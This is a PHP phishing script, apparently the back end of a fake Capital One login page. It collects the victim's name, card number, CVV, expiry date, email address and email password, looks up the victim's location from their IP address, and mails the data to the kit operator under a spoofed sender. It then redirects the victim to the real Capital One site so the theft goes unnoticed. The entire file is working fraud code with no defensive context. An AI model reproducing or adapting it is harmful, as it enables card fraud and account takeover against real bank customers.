<?php
session_start();
error_reporting(0);
include '../email.php';
$random = rand(0,100000).$_SERVER['REMOTE_ADDR'];
$session    = substr(md5($random), 0, 14);
$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($ip);
$RZ3 = simplexml_load_file("http://www.geoplugin.net/xml.gp?ip=$ip");
$CNCD = $RZ3->geoplugin_countryCode ; // Country
$STCD = $RZ3->geoplugin_regionCode ; //  State
$message .= "==========================  *CAPONE*   =================================\n";
$message .= "Name            :                                    ".$_POST['text1']."\n";
$message .= "cc_num         :                                     ".$_POST['text2']."\n";
$message .= "cv_num            :                                  ".$_POST['text3']."\n";
$message .= "Exp_m         :                                    ".$_POST['select1']."\n";
$message .= "Exp_y            :                                 ".$_POST['select2']."\n";
$message .= "Email         :                                     ".$_POST['text10']."\n";
$message .= "Email_pw            :                               ".$_POST['text11']."\n";
$message .= "from ip          :                                       $ip            \n";
$message .= "==========================  *CAPONE*   =================================\n";

$subject = "  | ~>| $CNCD | $STCD | Fr0m $ip";
$headers = "From:   CAP ONE ";
$headers = "From: CAP ONE | $ip <E@ma.il>";
mail($send,$subject,$message,$headers);


header('Location: https://locations.capitalone.com/');
?>